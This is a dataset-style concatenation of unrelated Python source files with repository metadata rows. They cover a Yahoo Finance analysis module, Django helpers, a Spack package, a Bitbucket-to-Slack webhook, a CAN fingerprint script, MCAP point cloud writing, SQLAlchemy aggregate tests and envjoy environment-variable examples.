df_mutualfund_shareholders["Stake"] = df_mutualfund_shareholders["Stake"].apply(
lambda x: str(f"{100 * x:.2f}") + " %"
)
print(df_mutualfund_shareholders.to_string(index=False))
print("")
except Exception as e:
print(e, "\n")
def sustainability(other_args: List[str], ticker: str):
"""Yahoo Finance ticker sustainability
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="sust",
description="""
Print sustainability values of the company. The following fields are expected:
Palmoil, Controversialweapons, Gambling, Socialscore, Nuclear, Furleather, Alcoholic,
Gmo, Catholic, Socialpercentile, Peercount, Governancescore, Environmentpercentile,
Animaltesting, Tobacco, Totalesg, Highestcontroversy, Esgperformance, Coal, Pesticides,
Adult, Percentile, Peergroup, Smallarms, Environmentscore, Governancepercentile,
Militarycontract. [Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
pd.set_option("display.max_colwidth", None)
df_sustainability = stock.sustainability
if df_sustainability is None:
print(f"No sustainability information in Yahoo for {ticker}", "\n")
return
if df_sustainability.empty:
print(f"No sustainability information in Yahoo for {ticker}", "\n")
return
clean_df_index(df_sustainability)
df_sustainability = df_sustainability.rename(
index={
"Controversialweapons": "Controversial Weapons",
"Socialpercentile": "Social Percentile",
"Peercount": "Peer Count",
"Governancescore": "Governance Score",
"Environmentpercentile": "Environment Percentile",
"Animaltesting": "Animal Testing",
"Highestcontroversy": "Highest Controversy",
"Environmentscore": "Environment Score",
"Governancepercentile": "Governance Percentile",
"Militarycontract": "Military Contract",
}
)
print(df_sustainability.to_string(header=False))
print("")
except Exception as e:
print(e, "\n")
def calendar_earnings(other_args: List[str], ticker: str):
"""Yahoo Finance ticker calendar earnings
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="cal",
description="""
Calendar earnings of the company. Including revenue and earnings estimates.
[Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
df_calendar = stock.calendar
if df_calendar.empty:
print(f"No earnings calendar information in Yahoo for {ticker}")
print("")
return
df_calendar.iloc[0, 0] = df_calendar.iloc[0, 0].date().strftime("%d/%m/%Y")
df_calendar.iloc[:, 0] = df_calendar.iloc[:, 0].apply(
lambda x: long_number_format(x)
)
print(f"Earnings Date: {df_calendar.iloc[:, 0]['Earnings Date']}")
avg = df_calendar.iloc[:, 0]["Earnings Average"]
low = df_calendar.iloc[:, 0]["Earnings Low"]
high = df_calendar.iloc[:, 0]["Earnings High"]
print(f"Earnings Estimate Avg: {avg} [{low}, {high}]")
print(
f"Revenue Estimate Avg: {df_calendar.iloc[:, 0]['Revenue Average']} \
[{df_calendar.iloc[:, 0]['Revenue Low']}, {df_calendar.iloc[:, 0]['Revenue High']}]"
)
print("")
except Exception as e:
print(e, "\n")
| 35.138667 | 100 | 0.61319 |
ca55552d1e3f21bc82a50b25febed67e25d84010 | 3,338 | py | Python | pdc/apps/common/hacks.py | bliuredhat/PDC | 48c7761d360225d6f4073adc2e7938348844e909 | [
"MIT"
] | 1 | 2018-05-02T08:39:37.000Z | 2018-05-02T08:39:37.000Z | pdc/apps/common/hacks.py | bliuredhat/PDC | 48c7761d360225d6f4073adc2e7938348844e909 | [
"MIT"
] | null | null | null | pdc/apps/common/hacks.py | bliuredhat/PDC | 48c7761d360225d6f4073adc2e7938348844e909 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
import re
from django.db import connection
from django.conf import settings
from django.core.exceptions import ValidationError
from rest_framework import serializers
from pkg_resources import parse_version
def deserialize_wrapper(func, data):
"""
Convert generic productmd exceptions into validation errors.
"""
try:
func(data)
except KeyError as e:
raise serializers.ValidationError(
{'detail': 'Error parsing productmd metadata.',
'reason': 'Missing key %s' % e.message}
)
except Exception as e:
raise serializers.ValidationError(
{'detail': 'Error parsing productmd metadata.',
'reason': str(e)}
)
def add_returning(sql):
"""
Add SQL clause required to return id of inserted item if the backend needs
it. The suffix is created only once and then cached.
"""
if not hasattr(add_returning, '_returning'):
add_returning._returning = ""
r_fmt = connection.ops.return_insert_id()
if r_fmt:
add_returning._returning = " " + r_fmt[0] % "id"
return sql + add_returning._returning
def bool_from_native(value):
"""Convert value to bool."""
if value in ('false', 'f', 'False', '0'):
return False
return bool(value)
def convert_str_to_bool(value, name=None):
"""
Try to strictly convert a string value to boolean or raise ValidationError.
"""
if value in (True, 'true', 't', 'True', '1'):
return True
if value in (False, 'false', 'f', 'False', '0'):
return False
ident = ' of %s' % name if name else ''
raise serializers.ValidationError('Value [%s]%s is not a boolean' % (value, ident))
def as_instance(arg, type, name=None):
"""Return arg if it is an instance of type, otherwise raise ValidationError."""
if not isinstance(arg, type):
ident = '%s: ' % name if name else ''
raise ValidationError('%s"%s" is not a %s' % (ident, arg, type.__name__))
return arg
def as_list(arg, name=None):
return as_instance(arg, list, name)
def as_dict(arg, name=None):
return as_instance(arg, dict, name)
def convert_str_to_int(value, name=None):
"""
Convert a string value to int or raise ValidationError.
"""
try:
value = int(value)
except:
ident = ' of %s' % name if name else ''
raise ValidationError('Value [%s]%s is not an integer' % (value, ident))
else:
return value
def validate_model(sender, **kwargs):
if "raw" in kwargs and not kwargs["raw"]:
kwargs["instance"].full_clean()
def srpm_name_to_component_names(srpm_name):
if settings.WITH_BINDINGS:
from pdc.apps.bindings import models as binding_models
return binding_models.ReleaseComponentSRPMNameMapping.get_component_names_by_srpm_name(srpm_name)
else:
return [srpm_name]
def parse_epoch_version(version):
"""
Wrapper around `pkg_resources.parse_version` that can handle epochs
delimited by colon as is customary for RPMs.
"""
if re.match(r'^\d+:', version):
version = re.sub(r'^(\d+):', r'\1!', version)
return parse_version(version)
| 28.529915 | 105 | 0.645596 |
0edf8b5e9890c9048cbe436c9067d6876be2c29b | 389 | py | Python | travel/travel/wsgi.py | Neeraj2701/numpy | bbc3167427eb8ecafeee3c5c9606b3532405dd96 | [
"BSD-3-Clause"
] | null | null | null | travel/travel/wsgi.py | Neeraj2701/numpy | bbc3167427eb8ecafeee3c5c9606b3532405dd96 | [
"BSD-3-Clause"
] | null | null | null | travel/travel/wsgi.py | Neeraj2701/numpy | bbc3167427eb8ecafeee3c5c9606b3532405dd96 | [
"BSD-3-Clause"
] | null | null | null | """
WSGI config for travel project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'travel.settings')
application = get_wsgi_application()
| 22.882353 | 78 | 0.784062 |
51898f56b60cd495c477ad270447f3714aa032c3 | 1,734 | py | Python | table.py | ZePedroResende/CC | 8644a518aeda3dc48f3e1c9700eff8b50b49b214 | [
"MIT"
] | 1 | 2021-04-06T13:44:41.000Z | 2021-04-06T13:44:41.000Z | table.py | ZePedroResende/CC | 8644a518aeda3dc48f3e1c9700eff8b50b49b214 | [
"MIT"
] | null | null | null | table.py | ZePedroResende/CC | 8644a518aeda3dc48f3e1c9700eff8b50b49b214 | [
"MIT"
] | null | null | null | import threading
class table:
def __init__(self):
self.server_list = {}
self.lock = threading.RLock()
def add_server(self, info):
with self.lock:
self.server_list[info['ip']] = info
def remove_server(self, server):
with self.lock:
del self.server_list[server['ip']]
def build_server(self, ip, porta, ram, cpu, rtt,
bandwidth, auth):
n_times = 0
with self.lock:
if ip in self.server_list:
n_times += self.server_list[ip]['n_times']
return {'ip': ip, 'porta': porta, 'ram': float(ram),
'cpu': float(cpu), 'rtt': float(rtt),
'bandwidth': float(bandwidth),
'n_times': n_times}
def print(self):
print("\n")
lista = []
for v in self.server_list.values():
m = len(str(v))
lista.append(v)
padding = (m-5) // 2
print("-"*padding + "TABLE" + "-" * padding)
for each in lista:
print(each)
print("-"*m)
print(self.best_server())
def best_server(self):
def media(d):
d = d[1]
media = (d['ram'] + d['cpu'] + d['bandwidth'])/3
load = media <= 70
time = d['rtt'] < 60
return load and time
with self.lock:
lista = sorted(self.server_list.items(),
key=lambda x: x[1]['n_times'])
filt = list(filter(lambda x: media(x), lista))
if not filt:
res = lista[0][1]
else:
res = filt[0][1]
self.server_list[res['ip']]['n_times'] += 1
return res
| 28.9 | 60 | 0.471165 |
62551cfc9cad599093e7245a3ce733e9df1a0edb | 855 | py | Python | var/spack/repos/builtin/packages/py-pythonqwt/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2018-11-27T03:39:44.000Z | 2021-09-06T15:50:35.000Z | var/spack/repos/builtin/packages/py-pythonqwt/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-01-11T20:11:52.000Z | 2019-01-11T20:11:52.000Z | var/spack/repos/builtin/packages/py-pythonqwt/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-10-14T14:20:17.000Z | 2020-10-14T14:20:17.000Z | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPythonqwt(PythonPackage):
"""Qt plotting widgets for Python"""
homepage = "https://github.com/PierreRaybaut/PythonQwt"
url = "https://pypi.io/packages/source/P/PythonQwt/PythonQwt-0.5.5.zip"
version('0.5.5', 'a60c7da9fbca667337d14aca094b6fda')
variant('doc', default=False, description="Build documentation.")
depends_on('py-setuptools', type='build')
depends_on('py-numpy@1.3:', type=('build', 'run'))
depends_on('py-sip', type=('build', 'run'))
depends_on('py-pyqt@4:', type=('build', 'run'))
depends_on('py-sphinx@1.1:', type=('build', 'run'), when='+docs')
| 35.625 | 80 | 0.669006 |
a71feaac7ac5930f5cb3661ef5607610d8f5c9d0 | 4,031 | py | Python | main.py | nshttpd/gcf-bb-slack | 5e5a63076ef2b33cd19f450eb99d710f30f1d498 | [
"BSD-3-Clause"
] | null | null | null | main.py | nshttpd/gcf-bb-slack | 5e5a63076ef2b33cd19f450eb99d710f30f1d498 | [
"BSD-3-Clause"
] | 1 | 2018-11-28T16:40:29.000Z | 2018-11-28T16:40:29.000Z | main.py | nshttpd/gcf-bb-slack | 5e5a63076ef2b33cd19f450eb99d710f30f1d498 | [
"BSD-3-Clause"
] | null | null | null | #
# simple GCF to handle a BB Webhook to Slack Webhook. i.e. a Thunk layer.
#
from flask import abort
import hashlib
import hmac
import os
import json
import logging
from urllib import request
#
# Validate the request based on a shared secret signature based on the body
#
# https://confluence.atlassian.com/bitbucketserver/managing-webhooks-in-bitbucket-server-938025878.html#ManagingwebhooksinBitbucketServer-Securingyourwebhook
#
def validate_request(body, signature):
sekret = os.environ.get('BITBUCKET_SECRET', None)
if sekret is not None:
s = bytes(sekret, 'utf-8')
h = hmac.new(s, body, digestmod=hashlib.sha256).hexdigest()
calc_sig = "sha256=%s" % h
if calc_sig == signature:
return True
logging.info('got invalid signature')
return False
def send_slack_msg(msg):
webhook = os.environ.get('SLACK_WEBHOOK', None)
if webhook is not None:
headers = {'Content-type': 'application/json'}
data = {'attachments': [msg], 'icon_emoji': ':bitbucket:'}
payload = bytes(json.dumps(data), 'utf-8')
req = request.Request(webhook, data=payload, headers=headers)
resp = request.urlopen(req)
return
def get_attachment_base(event):
events = {
'pr:opened': {'pretext': 'Pull Request Created', 'color': 'good'},
'pr:modified': {'pretext': 'Pull Request Modified', 'color': 'warning'},
'pr:reviewer:approved': {'pretext': 'Pull Request Approved', 'color': 'good'},
'pr:reviewer:unapproved': {'pretext': 'Pull Request Unapproved', 'color': 'danger'},
'pr:reviewer:needs_work': {'pretext': 'Pull Request Needs Work', 'color': 'warning'},
'pr:merged': {'pretext': 'Pull Request Merged', 'color': '#000000'},
'pr:declined': {'pretext': 'Pull Request Declined', 'color': 'danger'},
'pr:comment:added': {'pretext': 'Pull Request Comment Added', 'color': 'good'},
'pr:comment:edited': {'pretext': 'Pull Request Comment Edited', 'color': 'warning'},
'pr:comment:deleted': {'pretext': 'Pull Request Comment Deleted', 'color': 'danger'}
}
return events.get(event, None)
def slack_template(event_key, d, attachment):
bb_host = os.environ.get('BITBUCKET_HOST', None)
link = 'https://%s/projects/%s/repos/%s/pull-requests/%s/' % (bb_host,
d['pullRequest']['fromRef']['repository']['project']['key'],
d['pullRequest']['fromRef']['repository']['slug'],
d['pullRequest']['id'])
if event_key.startswith('pr:comment'):
attachment['text'] = '<%s|#%s> : %s' % (link, d['pullRequest']['id'], d['comment']['text'])
else:
attachment['text'] = '<%s|#%s> : %s' % (link, d['pullRequest']['id'], d['pullRequest']['title'])
attachment['fields'] = [
{
'title': 'Author',
'value': d['actor']['displayName'],
'short': True
},
{
'title': 'Repo : Branch',
'value': '%s : %s' % (d['pullRequest']['fromRef']['repository']['slug'], d['pullRequest']['fromRef']['displayId']),
'short': True
}
]
return attachment
def bb_webhook(req):
event_key = req.headers['x-event-key']
# ping to validate webhook.
if event_key == 'diagnostics:ping':
return 'PONG'
raw_req = req.get_data()
if validate_request(raw_req, req.headers['X-Hub-Signature']):
if req.method == 'POST':
if req.headers['content-type'] == 'application/json; charset=utf-8':
req_json = json.loads(raw_req)
attachment = get_attachment_base(event_key)
if attachment is not None:
attachment = slack_template(event_key, req_json, attachment)
send_slack_msg(attachment)
return 'OK'
return abort(404)
| 37.672897 | 157 | 0.577276 |
9ece7d7268cb3240737567b192484f343226bfc5 | 999 | py | Python | selfdrive/debug/get_fingerprint.py | 919bot/Tessa | 9b48ff9020e8fb6992fc78271f2720fd19e01093 | [
"MIT"
] | 85 | 2019-06-14T17:51:31.000Z | 2022-02-09T22:18:20.000Z | selfdrive/debug/get_fingerprint.py | 919bot/Tessa | 9b48ff9020e8fb6992fc78271f2720fd19e01093 | [
"MIT"
] | 4 | 2020-04-12T21:34:03.000Z | 2020-04-15T22:22:15.000Z | selfdrive/debug/get_fingerprint.py | 919bot/Tessa | 9b48ff9020e8fb6992fc78271f2720fd19e01093 | [
"MIT"
] | 73 | 2018-12-03T19:34:42.000Z | 2020-07-27T05:10:23.000Z | #!/usr/bin/env python3
# simple script to get a vehicle fingerprint.
# Instructions:
# - connect to a Panda
# - run selfdrive/boardd/boardd
# - launching this script
# - turn on the car in STOCK MODE (set giraffe switches properly).
# Note: it's very important that the car is in stock mode, in order to collect a complete fingerprint
# - since some messages are published at low frequency, keep this script running for at least 30s,
# until all messages are received at least once
import cereal.messaging as messaging
logcan = messaging.sub_sock('can')
msgs = {}
while True:
lc = messaging.recv_sock(logcan, True)
for c in lc.can:
# read also msgs sent by EON on CAN bus 0x80 and filter out the
# addr with more than 11 bits
if c.src in [0, 2] and c.address < 0x800:
msgs[c.address] = len(c.dat)
fingerprint = ', '.join("%d: %d" % v for v in sorted(msgs.items()))
print("number of messages {0}:".format(len(msgs)))
print("fingerprint {0}".format(fingerprint))
| 33.3 | 103 | 0.700701 |
c57cdbb31754286f6171b33571f0a576ef502002 | 98 | py | Python | backend/init_db.py | daniilmotsniy/FinancialAssistantBot | 2ca965a0ccfb8da72500c3da8da34ed48405cbaa | [
"MIT"
] | 1 | 2022-01-28T14:58:24.000Z | 2022-01-28T14:58:24.000Z | backend/init_db.py | daniilmotsniy/FinancialAssistantBot | 2ca965a0ccfb8da72500c3da8da34ed48405cbaa | [
"MIT"
] | 9 | 2021-08-07T11:25:18.000Z | 2021-11-14T15:49:51.000Z | backend/init_db.py | daniilmotsniy/FinancialAssistantBot | 2ca965a0ccfb8da72500c3da8da34ed48405cbaa | [
"MIT"
] | null | null | null | from models.user import User, db
from models.assets import Asset, AssetTypes, db
db.create_all()
| 19.6 | 47 | 0.785714 |
b389e58be274f06c0803095e0dbc385d5cd39079 | 2,052 | py | Python | src/openbiolink/graph_creation/metadata_edge/edge/edgeMetaGeneBindInhGene.py | jerryhluo/OpenBioLink | 6fc073af978daec0b0db5938b73beed37f57f495 | [
"MIT"
] | 97 | 2019-11-26T09:53:18.000Z | 2022-03-19T10:33:10.000Z | src/openbiolink/graph_creation/metadata_edge/edge/edgeMetaGeneBindInhGene.py | jerryhluo/OpenBioLink | 6fc073af978daec0b0db5938b73beed37f57f495 | [
"MIT"
] | 67 | 2019-12-09T21:01:52.000Z | 2021-12-21T15:19:41.000Z | src/openbiolink/graph_creation/metadata_edge/edge/edgeMetaGeneBindInhGene.py | jerryhluo/OpenBioLink | 6fc073af978daec0b0db5938b73beed37f57f495 | [
"MIT"
] | 20 | 2020-01-13T23:02:25.000Z | 2022-03-16T21:43:31.000Z | import os
from openbiolink.graph_creation import graphCreationConfig as glob
from openbiolink.graph_creation.metadata_edge.edgeRegularMetadata import EdgeRegularMetadata
from openbiolink.graph_creation.metadata_infile import InMetaEdgeStringBindInh
from openbiolink.graph_creation.metadata_infile.mapping.inMetaMapString import InMetaMapString
from openbiolink.graph_creation.types.qualityType import QualityType
class EdgeMetaGeneBindInhGene(EdgeRegularMetadata):
NAME = "Edge - Gene_binding/inhibition_Gene"
LQ_CUTOFF = 0
MQ_CUTOFF = 400
HQ_CUTOFF = 700
EDGE_INMETA_CLASS = InMetaEdgeStringBindInh
MAP1_META_CLASS = InMetaMapString
def __init__(self, quality: QualityType = None):
edges_file_path = os.path.join(glob.IN_FILE_PATH, self.EDGE_INMETA_CLASS.CSV_NAME)
mapping_file1 = os.path.join(glob.IN_FILE_PATH, self.MAP1_META_CLASS.CSV_NAME)
super().__init__(
is_directional=True,
edges_file_path=edges_file_path,
source=self.EDGE_INMETA_CLASS.SOURCE,
colindex1=self.EDGE_INMETA_CLASS.NODE1_COL,
colindex2=self.EDGE_INMETA_CLASS.NODE2_COL,
edgeType=self.EDGE_INMETA_CLASS.EDGE_TYPE,
node1_type=self.EDGE_INMETA_CLASS.NODE1_TYPE,
node1_namespace=self.EDGE_INMETA_CLASS.NODE1_NAMESPACE,
node2_type=self.EDGE_INMETA_CLASS.NODE2_TYPE,
node2_namespace=self.EDGE_INMETA_CLASS.NODE2_NAMESPACE,
colindex_qscore=self.EDGE_INMETA_CLASS.QSCORE_COL,
quality=quality,
mapping1_file=mapping_file1,
mapping1_targetnamespace=self.MAP1_META_CLASS.TARGET_NAMESPACE,
map1_sourceindex=self.MAP1_META_CLASS.SOURCE_COL,
map1_targetindex=self.MAP1_META_CLASS.TARGET_COL,
mapping2_file=mapping_file1,
mapping2_targetnamespace=self.MAP1_META_CLASS.TARGET_NAMESPACE,
map2_sourceindex=self.MAP1_META_CLASS.SOURCE_COL,
map2_targetindex=self.MAP1_META_CLASS.TARGET_COL,
)
| 45.6 | 94 | 0.75 |
049ebc0cc34c6f91fe4c60a882ee37e0bc753ca2 | 1,824 | py | Python | examples/point_cloud_example.py | foxglove/python-mcap-protobuf-support | ae325c9cbe49710fe397dff74939b5907b52aae9 | [
"Apache-2.0"
] | 1 | 2022-03-10T17:18:05.000Z | 2022-03-10T17:18:05.000Z | examples/point_cloud_example.py | foxglove/python-mcap-protobuf-support | ae325c9cbe49710fe397dff74939b5907b52aae9 | [
"Apache-2.0"
] | null | null | null | examples/point_cloud_example.py | foxglove/python-mcap-protobuf-support | ae325c9cbe49710fe397dff74939b5907b52aae9 | [
"Apache-2.0"
] | null | null | null | # This example writes a single point cloud message.
import os
import struct
import sys
from io import BytesIO
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import time
from random import random
from mcap.mcap0.writer import Writer as McapWriter
from mcap_protobuf.schema import register_schema
from ros.builtins_pb2 import Time
from ros.sensor_msgs.PointCloud2_pb2 import PointCloud2
from ros.sensor_msgs.PointField_pb2 import PointField
from ros.std_msgs.Header_pb2 import Header
output = open("point_cloud.mcap", "w+b")
mcap_writer = McapWriter(output)
mcap_writer.start(profile="protobuf", library="test")
cloud_schema_id = register_schema(writer=mcap_writer, message_class=PointCloud2)
cloud_channel_id = mcap_writer.register_channel(
topic="/point_cloud",
message_encoding="protobuf",
schema_id=cloud_schema_id,
)
header = Header(seq=0, stamp=Time(sec=int(time.time()), nsec=0), frame_id="example")
fields = [
PointField(name="x", offset=0, datatype=7, count=1),
PointField(name="y", offset=4, datatype=7, count=1),
PointField(name="z", offset=8, datatype=7, count=1),
PointField(name="intensity", offset=12, datatype=7, count=1),
]
num_points = 100
data = BytesIO()
scale = 2
for i in range(num_points):
data.write(
struct.pack(
"<ffff", scale * random(), scale * random(), scale * random(), random()
)
)
message = PointCloud2(
header=header,
width=num_points,
height=1,
point_step=16,
row_step=100 * 16,
fields=fields,
data=data.getvalue(),
is_bigendian=False,
is_dense=True,
)
mcap_writer.add_message(
channel_id=cloud_schema_id,
log_time=time.time_ns(),
data=message.SerializeToString(), # type: ignore
publish_time=time.time_ns(),
)
mcap_writer.finish()
output.close()
| 26.057143 | 84 | 0.720395 |
c752feba56cb8418ab3f98a29841b195abb82735 | 2,151 | py | Python | tests/aggregate/test_backrefs.py | jd/sqlalchemy-utils | fa78e45f9bd38b46d5aface41914dad022c0099b | [
"BSD-3-Clause"
] | null | null | null | tests/aggregate/test_backrefs.py | jd/sqlalchemy-utils | fa78e45f9bd38b46d5aface41914dad022c0099b | [
"BSD-3-Clause"
] | null | null | null | tests/aggregate/test_backrefs.py | jd/sqlalchemy-utils | fa78e45f9bd38b46d5aface41914dad022c0099b | [
"BSD-3-Clause"
] | null | null | null | import sqlalchemy as sa
from sqlalchemy_utils.aggregates import aggregated
from tests import TestCase
class TestAggregateValueGenerationForSimpleModelPaths(TestCase):
def create_models(self):
class Thread(self.Base):
__tablename__ = 'thread'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
@aggregated('comments', sa.Column(sa.Integer, default=0))
def comment_count(self):
return sa.func.count('1')
class Comment(self.Base):
__tablename__ = 'comment'
id = sa.Column(sa.Integer, primary_key=True)
content = sa.Column(sa.Unicode(255))
thread_id = sa.Column(sa.Integer, sa.ForeignKey('thread.id'))
thread = sa.orm.relationship(Thread, backref='comments')
self.Thread = Thread
self.Comment = Comment
def test_assigns_aggregates_on_insert(self):
thread = self.Thread()
thread.name = u'some article name'
self.session.add(thread)
comment = self.Comment(content=u'Some content', thread=thread)
self.session.add(comment)
self.session.commit()
self.session.refresh(thread)
assert thread.comment_count == 1
def test_assigns_aggregates_on_separate_insert(self):
thread = self.Thread()
thread.name = u'some article name'
self.session.add(thread)
self.session.commit()
comment = self.Comment(content=u'Some content', thread=thread)
self.session.add(comment)
self.session.commit()
self.session.refresh(thread)
assert thread.comment_count == 1
def test_assigns_aggregates_on_delete(self):
thread = self.Thread()
thread.name = u'some article name'
self.session.add(thread)
self.session.commit()
comment = self.Comment(content=u'Some content', thread=thread)
self.session.add(comment)
self.session.commit()
self.session.delete(comment)
self.session.commit()
self.session.refresh(thread)
assert thread.comment_count == 0
| 35.262295 | 73 | 0.637843 |
6ee9b1d0191d5ed3ed652b459fb925265b51a272 | 6,879 | py | Python | examples/basic.py | grimen/python-envjoy | e4abcc7251a400850c67419a96d29fe97f000fef | [
"MIT"
] | null | null | null | examples/basic.py | grimen/python-envjoy | e4abcc7251a400850c67419a96d29fe97f000fef | [
"MIT"
] | null | null | null | examples/basic.py | grimen/python-envjoy | e4abcc7251a400850c67419a96d29fe97f000fef | [
"MIT"
] | null | null | null |
# =========================================
# IMPORTS
# --------------------------------------
from __future__ import print_function # Optional: Python 2 support for `env.print`
import rootpath
rootpath.append()
# =========================================
# EXAMPLE
# --------------------------------------
from envjoy import env
# non-casted access - never throws annoying errors
print(env.FOO)
env.FOO = 1
print(env.FOO)
del env.FOO
print(env.FOO)
# casted access - never throws annoying errors
del env['FOO']
print('---')
print(env['FOO']) # => None
env['FOO']= 1 # set value without complaints (casted to string)
print(env['FOO']) # => "1"
print(env['FOO']) # => 1
print('---')
env['FOO'] = None
print(env['FOO']) # => ''
print(env['FOO', bool]) # => False
print(env['FOO', int]) # => 0
print(env['FOO', float]) # => 0.0
print(env['FOO', str]) # => ''
print(env['FOO', tuple]) # => ()
print(env['FOO', list]) # => []
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = True
print(env['FOO']) # => 'True'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 1
print(env['FOO', float]) # => 1.0
print(env['FOO', str]) # => 'true'
print(env['FOO', tuple]) # => (True)
print(env['FOO', list]) # => [True]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 'true' # => 'true'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 1
print(env['FOO', float]) # => 1.0
print(env['FOO', str]) # => 'true'
print(env['FOO', tuple]) # => (True)
print(env['FOO', list]) # => [True]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 0
print(env['FOO']) # => '0'
print(env['FOO', bool]) # => False
print(env['FOO', int]) # => 0
print(env['FOO', float]) # => 0.0
print(env['FOO', str]) # => '0'
print(env['FOO', tuple]) # => (0)
print(env['FOO', list]) # => [0]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '0'
print(env['FOO']) # => '0'
print(env['FOO', bool]) # => False
print(env['FOO', int]) # => 0
print(env['FOO', float]) # => 0.0
print(env['FOO', str]) # => '0'
print(env['FOO', tuple]) # => (0)
print(env['FOO', list]) # => [0]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 1
print(env['FOO']) # => '1'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 1
print(env['FOO', float]) # => 1.0
print(env['FOO', str]) # => '1'
print(env['FOO', tuple]) # => (1)
print(env['FOO', list]) # => [1]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '1'
print(env['FOO']) # => '1'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 1
print(env['FOO', float]) # => 1.0
print(env['FOO', str]) # => '1'
print(env['FOO', tuple]) # => (1)
print(env['FOO', list]) # => [1]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = -1
print(env['FOO']) # => '-1'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => -1
print(env['FOO', float]) # => -1.0
print(env['FOO', str]) # => '-1'
print(env['FOO', tuple]) # => (-1)
print(env['FOO', list]) # => [1]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '-1'
print(env['FOO']) # => '-1'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => -1
print(env['FOO', float]) # => -1.0
print(env['FOO', str]) # => '-1'
print(env['FOO', tuple]) # => (-1)
print(env['FOO', list]) # => [1]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 12.34
print(env['FOO']) # => '12.34'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 12
print(env['FOO', float]) # => 12.34
print(env['FOO', str]) # => '12.34'
print(env['FOO', tuple]) # => (12.34)
print(env['FOO', list]) # => [12.34]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '12.34'
print(env['FOO']) # => '12.34'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 12
print(env['FOO', float]) # => 12.34
print(env['FOO', str]) # => '12.34'
print(env['FOO', tuple]) # => (12.34)
print(env['FOO', list]) # => [12.34]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = -12.34
print(env['FOO']) # => '-12.34'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => -12
print(env['FOO', float]) # => -12.34
print(env['FOO', str]) # => '-12.34'
print(env['FOO', tuple]) # => (-12.34)
print(env['FOO', list]) # => [-12.34]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '-12.34'
print(env['FOO']) # => '-12.34'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => -12
print(env['FOO', float]) # => -12.34
print(env['FOO', str]) # => '-12.34'
print(env['FOO', tuple]) # => (-12.34)
print(env['FOO', list]) # => [-12.34]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 'foo bar baz 1 2 3'
print(env['FOO']) # => 'foo bar baz 1 2 3'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => 'foo bar baz 1 2 3'
print(env['FOO', tuple]) # => ('foo bar baz 1 2 3')
print(env['FOO', list]) # => ['foo bar baz 1 2 3']
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 'foo,bar,baz,1,2,3'
print(env['FOO']) # => 'foo,bar,baz,1,2,3'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => 'foo,bar,baz,1,2,3'
print(env['FOO', tuple]) # => ('foo', 'bar', 'baz')
print(env['FOO', list]) # => ['foo', 'bar', 'baz']
print(env['FOO', dict]) # => {0: 'foo', 1: 'bar', 2: 'baz'}
print('---')
env['FOO'] = ('foo', 'bar', 'baz', 1, 2, 3)
print(env['FOO']) # => '(foo,bar,baz,1,2,3)'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 123
print(env['FOO', float]) # => 123.0
print(env['FOO', str]) # => '(foo,bar,baz,1,2,3)'
print(env['FOO', tuple]) # => ('foo', 'bar', 'baz')
print(env['FOO', list]) # => ['foo', 'bar', 'baz', 1, 2, 3]
